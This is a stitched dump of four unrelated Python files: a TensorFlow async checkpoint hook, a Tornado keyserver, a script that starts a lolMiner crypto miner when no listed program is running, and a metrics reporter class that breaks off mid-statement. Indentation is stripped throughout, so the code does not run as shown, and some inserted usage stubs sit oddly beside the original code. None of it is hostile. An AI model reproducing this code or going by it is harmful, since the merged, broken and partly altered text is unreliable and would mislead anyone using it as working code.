# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._write_graph_thread = None
self._checkpoint_dir = checkpoint_dir
self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
self._last_checkpoint_step = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
# We do write graph and saver_def at the first call of before_run.
    # We cannot do this in begin, since we let other hooks change the graph and
# add variables in begin. Graph is finalized after all begin calls.
def _write_graph_fn(self):
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
self._write_graph_thread = threading.Thread(target=_write_graph_fn,
args=[self])
self._write_graph_thread.start()
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
logging.info("Triggering checkpoint. %s", global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
if self._write_graph_thread:
logging.info("Waiting for any pending write_graph to finish.")
self._write_graph_thread.join()
last_step = session.run(self._global_step_tensor)
if self._last_checkpoint_step != last_step:
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
for l in self._listeners:
l.after_save(session, step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
if not asynchronous:
self._last_checkpoint_step = step
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._last_checkpoint_step = step
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
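def _example_usage(model_fn, input_fn, model_dir="/tmp/async_ckpt_example"):
  """Minimal usage sketch (illustrative only; model_fn, input_fn and the paths
  are assumptions). The hook plugs into the standard training-hook mechanism."""
  import tensorflow as tf  # public API, in addition to the internal imports above
  hook = AsyncCheckpointSaverHook(checkpoint_dir=model_dir, save_steps=1000)
  estimator = tf.estimator.Estimator(model_fn=model_fn, model_dir=model_dir)
  estimator.train(input_fn=input_fn, hooks=[hook], max_steps=10000)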
|
server.py
|
__author__ = "Thomas Spycher, Philipp Spinnler"
__copyright__ = "Copyright 2013, Zerodine GmbH (zerodine.com) "
__credits__ = ["Thomas Spycher", "Philipp Spinnler"]
__license__ = "Apache-2.0"
__maintainer__ = "Thomas Spycher"
__email__ = "me@tspycher.com"
__status__ = "Development"
import sys, os
import threading
import logging
try:
import tornado.ioloop
import tornado.web
except ImportError:
sys.stderr.write("Looks like you have tornado not installed. (apt-get install python-tornado)")
sys.exit(1)
from krypton.hkpserver.libs.gossip import Gossiping
from controllers import *
hkpplus = False
try:
from krypton.hkpplus.controllers.apicontroller import ApiController
hkpplus = True
except ImportError as e:
if not "apicontroller" in str(e).lower():
raise e
class Server(object):
"""
"""
controllers = ['Lookup', 'Add', 'Index', 'Recon']
routes = []
routePrefix = None
applicationContext = None
logger = logging.getLogger("krypton")
gossiping = None
def __init__(self, routePrefix="/pks", applicationContext=None):
"""
:param routePrefix:
        :param applicationContext:
"""
self.routePrefix = routePrefix
self.applicationContext = applicationContext
self.gossiping = Gossiping(applicationContext=self.applicationContext)
if hkpplus:
self.controllers.append('Api')
logging.getLogger("krypton.bootstrap").info("Kryptonplus IS available, running enterprise version")
else:
logging.getLogger("krypton.bootstrap").info("Kryptonplus is NOT available, running community version")
def _buildRoutes(self):
"""
"""
print os.path.join(self.applicationContext.basePath, "../doc/html")
staticPre = [
(r'/doc/(.*)', tornado.web.StaticFileHandler,
{'path': os.path.join(self.applicationContext.basePath, "doc/html")})
]
staticPost = [
(r'/(.*)', tornado.web.StaticFileHandler,
{'path': os.path.join(self.applicationContext.basePath, "hkpserver/wwwroot")})
]
for s in staticPre:
self.routes.append(s)
for c in self.controllers:
self.routes.append(eval("%sController" % c).routes(
prefix=self.routePrefix,
applicationContext=self.applicationContext))
for s in staticPost:
self.routes.append(s)
def start(self, port=11371, as_thread=False):
"""
:param port:
:param as_thread:
:return:
"""
self._buildRoutes()
application = tornado.web.Application(self.routes)
application.listen(port)
self.logger.info("Server will liston on Port: %i" % port)
self.gossiping.start()
if as_thread:
threading.Thread(target=self._start).start()
return True
else:
self._start()
def _start(self):
"""
"""
tornado.ioloop.IOLoop.instance().start()
def stop(self):
"""
"""
tornado.ioloop.IOLoop.instance().stop()
self.gossiping.stop()
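def run_example(applicationContext, port=11371):
    """
    Minimal usage sketch (illustrative only; applicationContext is assumed to be
    the object krypton builds during bootstrap).
    :param applicationContext:
    :param port:
    :return:
    """
    server = Server(routePrefix="/pks", applicationContext=applicationContext)
    server.start(port=port, as_thread=True)
    return server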
|
app.py
|
import os
import pathlib
import signal
import subprocess
import sys
import threading
import time
from os import sep
from pathlib import Path
from typing import Tuple, Union
import pandas as pd
import psutil
DIRPATH = Path(r"D:\Mining\lolMiner")
FILEPATH = Path("lolMiner.exe")
ARGS = ("--algo", "ETCHASH", "--pool", "eu1-etc.ethermine.org:4444", "--user", "0x1e3543b1845c418668cE20FE2eaB28484A6B8d1B.PC-Miner")
LISTFILE = pathlib.Path("ProgramList.txt")
class App:
__alive: bool
__sleep_time: int
alive = property(lambda self: self.__alive)
def __init__(self):
signal.signal(signal.SIGINT, lambda sig, frame: self.signalHandler())
self.__listupdater = ProgramListUpdater(LISTFILE)
self.__process_searcher = ProcessSearcher(
FileLoader.loadFile(LISTFILE))
self.__miner = Miner(executable=DIRPATH / FILEPATH, args=ARGS)
self.__thread_checker = threading.Thread(target=self.checker)
self.__alive = False
self.__sleep_time = 1
def signalHandler(self):
self.stop()
print('Exiting!')
sys.exit(0)
def start(self):
self.__alive = True
self.__thread_checker.start()
while self.alive:
time.sleep(0.5)
# signal.pause()
def checker(self):
while self.__alive:
# updates list of programs
self.__process_searcher.process_list = self.__listupdater.programs
if(self.__miner.alive and self.__process_searcher.searchInList()):
self.__miner.stop()
print("Miner Stopped!")
elif(not self.__miner.alive and not self.__process_searcher.searchInList()):
print("Miner Started!")
self.__miner.start()
time.sleep(self.__sleep_time)
self.__miner.stop()
def stop(self):
self.__alive = False
self.__miner.stop()
class FileLoader:
    @staticmethod
    def loadFile(file: str) -> set[str]:
        return set(pd.read_csv(file, header=None).values.flat)
class ProgramListUpdater():
_lastupdate: float = 0
_programs: set[str]
last_update = property(lambda self: time.ctime(self._lastupdate))
programs = property(lambda self: self._getList())
def __init__(self, file: str):
self.__file = file
def _update(self):
# time.ctime(os.stat(self.__file)[os.stat.ST_MTIME])
result, last_mtime = self.isChanged()
if result:
self._lastupdate = last_mtime
self._programs = FileLoader.loadFile(self.__file)
def _getList(self):
        if self.isChanged()[0]:
self._update()
return self._programs
def isChanged(self):
mtime = os.stat(self.__file).st_mtime
return self._lastupdate != mtime, mtime
class ProcessSearcher:
_process_list: set[str]
process_list = property(lambda self: self._process_list,
fset=lambda self, value: self.__listToSet(value))
def __init__(self, process_list: Union[list, set, str] = []):
self._process_list = self.__listToSet(process_list)
def __listToSet(self, process_list):
return {proc.lower() for proc in process_list}
def searchInList(self) -> bool:
return any(
p.name().lower() in self._process_list for p in psutil.process_iter()
)
class Miner:
__filepath: str
__args: list[str]
__process: subprocess.Popen = None
__return_code: int
executable = property(lambda self: self.__filepath)
args = property(lambda self: self.__args)
alive = property(lambda self: self.isAlive())
def __init__(self, args:Union[list[str],Tuple], executable: Union[str,Path]=None):
"""Miner constructor.
Args:
            args (Union[list[str],Tuple]): List of arguments to pass to the miner.
            executable (Union[str,Path], optional): Executable to use for the miner; if None, the first element of args is used. Defaults to None.
Raises:
ValueError: if args and executable are not set.
"""
if not args and not executable:
raise ValueError()
args = list(args)
executable = args.pop(0) if not executable else str(executable)
self.__filepath, self.__args = executable, args
def __cmd(self):
return [self.__filepath] + self.__args
def start(self):
self.__process = subprocess.Popen(args=self.__cmd(), stdin=subprocess.DEVNULL)
def stop(self):
if self.alive:
self.__process.terminate()
def kill(self):
if self.alive:
self.__process.kill()
def isAlive(self) -> bool:
if self.__process is None:
return False
        if self.getReturnCode() is None:
return True
return False
def getReturnCode(self):
if self.__process is None:
return None
self.__return_code = self.__process.poll()
return self.__return_code
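# A minimal sketch of the blocklist check (illustrative only; the names below are
# assumptions -- real entries come from ProgramList.txt, read via pandas, with one
# executable name per line and matched case-insensitively against psutil):
def _example_blocklist_check() -> bool:
    searcher = ProcessSearcher({"chrome.exe", "valorant.exe"})
    return searcher.searchInList()  # True if any listed program is currently running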
if __name__ == "__main__":
app = App()
app.start()
|
reporter.py
|
import json
import math
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
import numpy as np
from threading import Thread, Event
from ..base import InterfaceBase
from ..setupuploadmixin import SetupUploadMixin
from ...utilities.async_manager import AsyncManagerMixin
from ...utilities.plotly_reporter import create_2d_histogram_plot, create_value_matrix, create_3d_surface, \
create_2d_scatter_series, create_3d_scatter_series, create_line_plot, plotly_scatter3d_layout_dict, \
create_image_plot, create_plotly_table
from ...utilities.py3_interop import AbstractContextManager
from .events import ScalarEvent, VectorEvent, ImageEvent, PlotEvent, ImageEventNoUpload, UploadEvent, MediaEvent
from ...config import config
class Reporter(InterfaceBase, AbstractContextManager, SetupUploadMixin, AsyncManagerMixin):
"""
A simple metrics reporter class.
    This class caches reports and supports both explicit flushing and context-based flushing. To ensure reports are
sent to the backend, please use (assuming an instance of Reporter named 'reporter'):
- use the context manager feature (which will automatically flush when exiting the context):
with reporter:
reporter.report...
...
- explicitly call flush:
reporter.report...
...
reporter.flush()
"""
def __init__(self, metrics, flush_threshold=10, async_enable=False):
"""
Create a reporter
:param metrics: A Metrics manager instance that handles actual reporting, uploads etc.
:type metrics: .backend_interface.metrics.Metrics
:param flush_threshold: Events flush threshold. This determines the threshold over which cached reported events
are flushed and sent to the backend.
:type flush_threshold: int
"""
log = metrics.log.getChild('reporter')
log.setLevel(log.level)
super(Reporter, self).__init__(session=metrics.session, log=log)
self._metrics = metrics
self._flush_threshold = flush_threshold
self._events = []
self._bucket_config = None
self._storage_uri = None
self._async_enable = async_enable
self._flush_frequency = 30.0
self._exit_flag = False
self._flush_event = Event()
self._flush_event.clear()
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
self._max_iteration = 0
def _set_storage_uri(self, value):
value = '/'.join(x for x in (value.rstrip('/'), self._metrics.storage_key_prefix) if x)
self._storage_uri = value
storage_uri = property(None, _set_storage_uri)
max_float_num_digits = config.get('metrics.plot_max_num_digits', None)
@property
def flush_threshold(self):
return self._flush_threshold
@flush_threshold.setter
def flush_threshold(self, value):
self._flush_threshold = max(0, value)
@property
def async_enable(self):
return self._async_enable
@async_enable.setter
def async_enable(self, value):
self._async_enable = bool(value)
@property
def max_iteration(self):
return self._max_iteration
def _daemon(self):
while not self._exit_flag:
self._flush_event.wait(self._flush_frequency)
self._flush_event.clear()
self._write()
# wait for all reports
if self.get_num_results() > 0:
self.wait_for_results()
# make sure we flushed everything
self._async_enable = False
self._write()
if self.get_num_results() > 0:
self.wait_for_results()
def _report(self, ev):
ev_iteration = ev.get_iteration()
if ev_iteration is not None:
# we have to manually add get_iteration_offset() because event hasn't reached the Metric manager
self._max_iteration = max(self._max_iteration, ev_iteration + self._metrics.get_iteration_offset())
self._events.append(ev)
if len(self._events) >= self._flush_threshold:
self.flush()
def _write(self):
if not self._events:
return
# print('reporting %d events' % len(self._events))
res = self._metrics.write_events(self._events, async_enable=self._async_enable, storage_uri=self._storage_uri)
if self._async_enable:
self._add_async_result(res)
self._events = []
def flush(self):
"""
Flush cached reports to backend.
"""
self._flush_event.set()
def stop(self):
self._exit_flag = True
self._flush_event.set()
self._thread.join()
def report_scalar(self, title, series, value, iter):
"""
Report a scalar value
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param value: Reported value
:type value: float
:param iter: Iteration number
        :type iter: int
"""
ev = ScalarEvent(metric=self._normalize_name(title), variant=self._normalize_name(series), value=value,
iter=iter)
self._report(ev)
def report_vector(self, title, series, values, iter):
"""
Report a vector of values
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param values: Reported values
        :type values: [float]
        :param iter: Iteration number
        :type iter: int
"""
if not isinstance(values, Iterable):
raise ValueError('values: expected an iterable')
ev = VectorEvent(metric=self._normalize_name(title), variant=self._normalize_name(series), values=values,
iter=iter)
self._report(ev)
def report_plot(self, title, series, plot, iter, round_digits=None):
"""
Report a Plotly chart
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param plot: A JSON describing a plotly chart (see https://help.plot.ly/json-chart-schema/)
:type plot: str or dict
:param iter: Iteration number
:param round_digits: number of digits after the dot to leave
        :type iter: int
"""
def floatstr(o):
if o != o:
return 'nan'
elif o == math.inf:
return 'inf'
elif o == -math.inf:
return '-inf'
return round(o, ndigits=round_digits) if round_digits is not None else o
# noinspection PyBroadException
try:
# Special json encoder for numpy types
def default(obj):
if isinstance(obj, (np.integer, np.int64)):
return int(obj)
elif isinstance(obj, np.floating):
return float(round(obj, ndigits=round_digits) if round_digits is not None else obj)
elif isinstance(obj, np.ndarray):
return obj.round(round_digits).tolist() if round_digits is not None else obj.tolist()
except Exception:
default = None
if round_digits is None:
round_digits = self.max_float_num_digits
if round_digits is False:
round_digits = None
if isinstance(plot, dict):
if 'data' in plot:
for d in plot['data']:
if not isinstance(d, dict):
continue
for k, v in d.items():
if isinstance(v, list):
d[k] = list(floatstr(s) if isinstance(s, float) else s for s in v)
elif isinstance(v, tuple):
d[k] = tuple(floatstr(s) if isinstance(s, float) else s for s in v)
elif isinstance(v, float):
d[k] = floatstr(v)
plot = json.dumps(plot, default=default)
elif not isinstance(plot, six.string_types):
raise ValueError('Plot should be a string or a dict')
ev = PlotEvent(metric=self._normalize_name(title), variant=self._normalize_name(series),
plot_str=plot, iter=iter)
self._report(ev)
def report_image(self, title, series, src, iter):
"""
Report an image.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param src: Image source URI. This URI will be used by the webapp and workers when trying to obtain the image
for presentation or processing. Currently only http(s), file and s3 schemes are supported.
:type src: str
:param iter: Iteration number
:type iter: int
"""
ev = ImageEventNoUpload(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
src=src)
self._report(ev)
def report_media(self, title, series, src, iter):
"""
Report a media link.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param src: Media source URI. This URI will be used by the webapp and workers when trying to obtain the media
for presentation or processing. Currently only http(s), file and s3 schemes are supported.
:type src: str
:param iter: Iteration number
:type iter: int
"""
ev = ImageEventNoUpload(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
src=src)
self._report(ev)
def report_image_and_upload(self, title, series, iter, path=None, image=None, upload_uri=None,
max_image_history=None, delete_after_upload=False):
"""
Report an image and upload its contents. Image is uploaded to a preconfigured bucket (see setup_upload()) with
a key (filename) describing the task ID, title, series and iteration.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param iter: Iteration number
:type iter: int
:param path: A path to an image file. Required unless image is provided.
:type path: str
:param image: Image data. Required unless path is provided.
:type image: A PIL.Image.Image object or a 3D numpy.ndarray object
:param upload_uri: Upload destination URI. If not provided, the preconfigured storage URI is used.
:type upload_uri: str
:param max_image_history: maximum number of images to store per metric/variant combination;
use a negative value for unlimited. The default is set in the global configuration (default=5)
:param delete_after_upload: if True, the local copy will be deleted once the file has been uploaded
:type delete_after_upload: boolean
"""
if not self._storage_uri and not upload_uri:
raise ValueError('Upload configuration is required (use setup_upload())')
if len([x for x in (path, image) if x is not None]) != 1:
raise ValueError('Expected exactly one of [path, image]')
kwargs = dict(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
file_history_size=max_image_history)
ev = ImageEvent(image_data=image, upload_uri=upload_uri, local_image_path=path,
delete_after_upload=delete_after_upload, **kwargs)
self._report(ev)
def report_media_and_upload(self, title, series, iter, path=None, stream=None, upload_uri=None,
file_extension=None, max_history=None, delete_after_upload=False):
"""
Report a media file/stream and upload its contents.
Media is uploaded to a preconfigured bucket
(see setup_upload()) with a key (filename) describing the task ID, title, series and iteration.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param iter: Iteration number
:type iter: int
:param path: A path to a media file. Required unless stream is provided.
:type path: str
:param stream: File/string stream. Required unless path is provided.
:param upload_uri: Upload destination URI. If not provided, the preconfigured storage URI is used.
:param file_extension: file extension to use when stream is passed
:param max_history: maximum number of files to store per metric/variant combination;
use a negative value for unlimited. The default is set in the global configuration (default=5)
:param delete_after_upload: if True, the local copy will be deleted once the file has been uploaded
:type delete_after_upload: boolean
"""
if not self._storage_uri and not upload_uri:
raise ValueError('Upload configuration is required (use setup_upload())')
if len([x for x in (path, stream) if x is not None]) != 1:
raise ValueError('Expected exactly one of [path, stream]')
if isinstance(stream, six.string_types):
stream = six.StringIO(stream)
kwargs = dict(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
file_history_size=max_history)
ev = MediaEvent(stream=stream, upload_uri=upload_uri, local_image_path=path,
override_filename_ext=file_extension,
delete_after_upload=delete_after_upload, **kwargs)
self._report(ev)
def report_histogram(self, title, series, histogram, iter, labels=None, xlabels=None,
xtitle=None, ytitle=None, comment=None, mode='group', layout_config=None):
"""
Report a histogram bar plot
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param histogram: The histogram data.
A row for each dataset (a bar in a bar group). A column for each bucket.
:type histogram: numpy array
:param iter: Iteration number
:type iter: int
:param labels: The labels for each bar group.
:type labels: list of strings.
:param xlabels: The labels of the x axis.
:type xlabels: List of strings.
:param str xtitle: optional x-axis title
:param str ytitle: optional y-axis title
:param comment: comment underneath the title
:type comment: str
:param mode: multiple histograms mode. valid options are: stack / group / relative. Default is 'group'.
:type mode: str
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
assert mode in ('stack', 'group', 'relative')
plotly_dict = create_2d_histogram_plot(
np_row_wise=histogram,
title=title,
xtitle=xtitle,
ytitle=ytitle,
labels=labels,
series=series,
xlabels=xlabels,
comment=comment,
mode=mode,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_table(self, title, series, table, iteration, layout_config=None):
"""
Report a table plot.
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param table: The table data
:type table: pandas.DataFrame
:param iteration: Iteration number
:type iteration: int
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
table_output = create_plotly_table(table, title, series, layout_config=layout_config)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=table_output,
iter=iteration,
round_digits=False,
)
def report_line_plot(self, title, series, iter, xtitle, ytitle, mode='lines', reverse_xaxis=False,
comment=None, layout_config=None):
"""
Report a (possibly multiple) line plot.
:param title: Title (AKA metric)
:type title: str
:param series: All the series' data, one for each line in the plot.
:type series: An iterable of LineSeriesInfo.
:param iter: Iteration number
:type iter: int
:param xtitle: x-axis title
:type xtitle: str
:param ytitle: y-axis title
:type ytitle: str
:param mode: 'lines' / 'markers' / 'lines+markers'
:type mode: str
:param reverse_xaxis: If true X axis will be displayed from high to low (reversed)
:type reverse_xaxis: bool
:param comment: comment underneath the title
:type comment: str
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_line_plot(
title=title,
series=series,
xtitle=xtitle,
ytitle=ytitle,
mode=mode,
reverse_xaxis=reverse_xaxis,
comment=comment,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series='',
plot=plotly_dict,
iter=iter,
)
def report_2d_scatter(self, title, series, data, iter, mode='lines', xtitle=None, ytitle=None, labels=None,
comment=None, layout_config=None):
"""
Report a 2d scatter graph (with lines)
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: Scattered data: x,y pairs as rows in a numpy array
:type data: ndarray
:param iter: Iteration number
:type iter: int
:param mode: (type str) 'lines'/'markers'/'lines+markers'
:param xtitle: optional x-axis title
:param ytitle: optional y-axis title
:param labels: label (text) per point in the scatter (in the same order)
:param comment: comment underneath the title
:type comment: str
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_2d_scatter_series(
np_row_wise=data,
title=title,
series_name=series,
mode=mode,
xtitle=xtitle,
ytitle=ytitle,
labels=labels,
comment=comment,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_3d_scatter(self, title, series, data, iter, labels=None, mode='lines', color=((217, 217, 217, 0.14),),
marker_size=5, line_width=0.8, xtitle=None, ytitle=None, ztitle=None, fill=None,
comment=None, layout_config=None):
"""
Report a 3d scatter graph (with markers)
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: Scattered data: x,y,z triplets as rows in a numpy array, or a list of such arrays
:type data: ndarray or list of ndarray
:param iter: Iteration number
:type iter: int
:param labels: label (text) per point in the scatter (in the same order)
:type labels: list of str
:param mode: (type str) 'lines'/'markers'/'lines+markers'
:param color: list of RGBA colors [(217, 217, 217, 0.14),]
:param marker_size: marker size in px
:param line_width: line width in px
:param xtitle: optional x-axis title
:param ytitle: optional y-axis title
:param ztitle: optional z-axis title
:param comment: comment underneath the title
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
data_series = data if isinstance(data, list) else [data]
def get_labels(i):
if labels and isinstance(labels, list):
try:
item = labels[i]
except IndexError:
item = labels[-1]
if isinstance(item, list):
return item
return labels
plotly_obj = plotly_scatter3d_layout_dict(
title=title,
xaxis_title=xtitle,
yaxis_title=ytitle,
zaxis_title=ztitle,
comment=comment,
layout_config=layout_config,
)
for i, values in enumerate(data_series):
plotly_obj = create_3d_scatter_series(
np_row_wise=values,
title=title,
series_name=series[i] if isinstance(series, list) else None,
labels=get_labels(i),
plotly_obj=plotly_obj,
mode=mode,
line_width=line_width,
marker_size=marker_size,
color=color,
fill_axis=fill,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series) if not isinstance(series, list) else None,
plot=plotly_obj,
iter=iter,
)
def report_value_matrix(self, title, series, data, iter, xtitle=None, ytitle=None, xlabels=None, ylabels=None,
yaxis_reversed=False, comment=None, layout_config=None):
"""
Report a heat-map matrix
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: A heat-map matrix (example: confusion matrix)
:type data: ndarray
:param iter: Iteration number
:type iter: int
:param str xtitle: optional x-axis title
:param str ytitle: optional y-axis title
:param xlabels: optional label per column of the matrix
:param ylabels: optional label per row of the matrix
:param bool yaxis_reversed: If False, (0,0) is at the bottom left corner. If True, (0,0) is at the top left corner
:param comment: comment underneath the title
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_value_matrix(
np_value_matrix=data,
title=title,
xlabels=xlabels,
ylabels=ylabels,
series=series,
comment=comment,
xtitle=xtitle,
ytitle=ytitle,
yaxis_reversed=yaxis_reversed,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_value_surface(self, title, series, data, iter, xlabels=None, ylabels=None,
xtitle=None, ytitle=None, ztitle=None, camera=None, comment=None, layout_config=None):
"""
Report a 3d surface (same data as heat-map matrix, only presented differently)
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param data: A heat-map matrix (example: confusion matrix)
:type data: ndarray
:param iter: Iteration number
:type iter: int
:param xlabels: optional label per column of the matrix
:param ylabels: optional label per row of the matrix
:param xtitle: optional x-axis title
:param ytitle: optional y-axis title
:param ztitle: optional z-axis title
:param camera: X,Y,Z camera position. Default: (1,1,1)
:param comment: comment underneath the title
:param layout_config: optional dictionary for layout configuration, passed directly to plotly
:type layout_config: dict or None
"""
plotly_dict = create_3d_surface(
np_value_matrix=data,
title=title + '/' + series,
xlabels=xlabels,
ylabels=ylabels,
series=series,
xtitle=xtitle,
ytitle=ytitle,
ztitle=ztitle,
camera=camera,
comment=comment,
layout_config=layout_config,
)
return self.report_plot(
title=self._normalize_name(title),
series=self._normalize_name(series),
plot=plotly_dict,
iter=iter,
)
def report_image_plot_and_upload(self, title, series, iter, path=None, matrix=None,
upload_uri=None, max_image_history=None, delete_after_upload=False):
"""
Report an image as plot and upload its contents.
Image is uploaded to a preconfigured bucket (see setup_upload()) with a key (filename)
describing the task ID, title, series and iteration.
Then a plotly object is created and registered; this plotly object points to the uploaded image
:param title: Title (AKA metric)
:type title: str
:param series: Series (AKA variant)
:type series: str
:param iter: Iteration number
:type iter: int
:param path: A path to an image file. Required unless matrix is provided.
:type path: str
:param matrix: A 3D numpy.ndarray object containing image data (RGB). Required unless path is provided.
:type matrix: numpy.ndarray
:param upload_uri: upload image destination (str)
:type upload_uri: str
:param max_image_history: maximum number of images to store per metric/variant combination;
use a negative value for unlimited. The default is set in the global configuration (default=5)
:param delete_after_upload: if True, the local copy will be deleted once the file has been uploaded
:type delete_after_upload: boolean
"""
if not upload_uri and not self._storage_uri:
raise ValueError('Upload configuration is required (use setup_upload())')
if len([x for x in (path, matrix) if x is not None]) != 1:
raise ValueError('Expected exactly one of [path, matrix]')
kwargs = dict(metric=self._normalize_name(title), variant=self._normalize_name(series), iter=iter,
file_history_size=max_image_history)
if matrix is not None:
width = matrix.shape[1]
height = matrix.shape[0]
else:
# noinspection PyBroadException
try:
from PIL import Image
width, height = Image.open(path).size
except Exception:
width = 640
height = 480
ev = UploadEvent(image_data=matrix, upload_uri=upload_uri, local_image_path=path,
